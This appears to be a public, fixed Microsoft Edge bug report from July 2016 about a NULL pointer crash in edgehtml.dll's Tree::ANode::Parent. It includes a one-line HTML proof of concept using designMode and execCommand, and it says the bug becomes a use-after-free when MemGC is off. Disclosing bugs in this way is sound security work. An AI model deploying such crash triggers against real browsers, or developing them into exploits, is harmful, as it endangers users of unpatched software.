AV - Another NULL pointer in microsoftedgecp.exe!edgehtml.dll!Tree։։ANode։։Parent

Fixed Issue #8162255


Jul 13, 2016
This issue is public.
  • Microsoft Edge
Crash in same function as https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/8162240/, but with different call stack.

<style>*:first-letter{color:red</style><body onload=d=document;d.designMode="on";d.execCommand(“JustifyFull”)>


  • FYI: disabling MemGC turns this into a use-after-free

